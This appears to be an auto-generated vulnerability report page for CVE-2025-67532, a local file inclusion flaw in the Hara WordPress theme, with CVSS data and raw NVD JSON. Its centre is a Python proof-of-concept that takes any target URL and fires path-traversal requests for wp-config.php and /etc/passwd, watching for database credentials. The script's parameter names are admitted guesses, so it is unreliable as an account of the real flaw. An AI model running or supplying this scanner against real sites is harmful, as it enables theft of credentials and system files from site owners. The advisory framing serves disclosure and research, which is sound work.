Security Vulnerability Report
中文
CVE-2025-67532 CVSS 7.5 HIGH

CVE-2025-67532

Published: 2025-12-09 16:18:28
Last Modified: 2026-04-27 18:16:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Hara hara allows PHP Local File Inclusion.This issue affects Hara: from n/a through <= 1.2.17.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hara主题 <= 1.2.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67532 PoC - Hara Theme LFI # Target: WordPress site using Hara theme <= 1.2.17 import requests import sys target = input("Enter target URL (e.g., http://target.com): ").strip() # Common LFI parameters used in Hara theme params = ['file', 'template', 'page', 'include', 'load', 'view'] # Files to test for LFI test_files = [ "../../wp-config.php", "../../../wp-config.php", "../../../../wp-config.php", "../../../../../wp-config.php", "../../etc/passwd", "../../../etc/passwd", "../../../../etc/passwd" ] print(f"[*] Testing {target} for LFI vulnerability...") for param in params: for test_file in test_files: url = f"{target}/wp-content/themes/hara/" try: r = requests.get(url, params={param: test_file}, timeout=10) if "DB_NAME" in r.text or "root:" in r.text: print(f"[!] VULNERABLE! Parameter: {param}, File: {test_file}") print(f"[*] URL: {r.url}") print(f"[*] Response length: {len(r.text)}") sys.exit(0) except requests.RequestException as e: print(f"[-] Error: {e}") print("[*] No obvious LFI found with basic tests.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67532", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:27.963", "lastModified": "2026-04-27T18:16:42.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Hara hara allows PHP Local File Inclusion.This issue affects Hara: from n/a through <= 1.2.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/hara/vulnerability/wordpress-hara-theme-1-2-17-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}